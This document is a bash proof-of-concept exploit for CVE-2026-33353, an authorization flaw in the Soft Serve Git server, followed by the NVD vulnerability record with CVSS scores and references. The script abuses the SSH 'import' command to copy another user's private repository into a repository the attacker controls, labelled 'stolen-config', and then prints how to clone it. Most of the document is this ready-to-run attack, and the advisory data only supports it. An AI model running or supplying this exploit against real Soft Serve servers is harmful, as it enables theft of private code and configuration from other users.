CVE-2026-33353

#!/bin/bash # PoC for CVE-2026-33353: Soft Serve Authorization Bypass # Description: Exploit the repo import feature to clone a private repository. TARGET_HOST="vulnerable.example.com" TARGET_USER="git" # The private repo we want to steal (path on the server) PRIVATE_REPO="admin/private-config" # The name of the new repo we will create NEW_REPO_NAME="stolen-config" echo "[*] Attempting to exploit CVE-2026-33353 against ${TARGET_HOST}" echo "[*] Targeting private repo: ${PRIVATE_REPO}" # Soft Serve uses SSH for interaction. # The 'import' command is the vulnerable vector. # Usage: ssh git@host import <source> <dest> # In vulnerable versions, <source> can be any local repo. ssh ${TARGET_USER}@${TARGET_HOST} import ${PRIVATE_REPO} ${NEW_REPO_NAME} if [ $? -eq 0 ]; then echo "[+] Exploit successful! Private repo cloned to ${NEW_REPO_NAME}" echo "[+] You can now clone it locally using:" echo " git clone ssh://${TARGET_USER}@${TARGET_HOST}/${NEW_REPO_NAME}" else echo "[-] Exploit failed. Target might be patched or credentials invalid." fi

{"cve": {"id": "CVE-2026-33353", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:29.573", "lastModified": "2026-03-25T21:59:38.923", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Soft Serve is a self-hostable Git server for the command line. From version 0.6.0 to before version 0.11.6, an authorization flaw in repo import allows any authenticated SSH user to clone a server-local Git repository, including another user's private repo, into a new repository they control. This issue has been patched in version 0.11.6."}, {"lang": "es", "value": "Soft Serve es un servidor Git autoalojable para la línea de comandos. Desde la versión 0.6.0 hasta antes de la versión 0.11.6, una falla de autorización en la importación de repositorios permite a cualquier usuario SSH autenticado clonar un repositorio Git local del servidor, incluyendo el repositorio privado de otro usuario, en un nuevo repositorio que ellos controlan. Este problema ha sido parcheado en la versión 0.11.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:charm:soft_serve:*:*:*:*:*:go:*:*", "versionStartIncluding": "0.6.0", "versionEndExcluding": "0.11.6", "matchCriteriaId": "EDBD42A1-C2A7-4A84-AA41-6317A9812FF7"}]}]}], "references": [{"url": "https://github.com/charmbracelet/soft-serve/commit/c147421caf234bcfc1570c79d728ecbbe5813e55", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/charmbracelet/soft-serve/releases/tag/v0.11.6", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-xgxp-f695-6vrp", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-xgxp-f695-6vrp", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}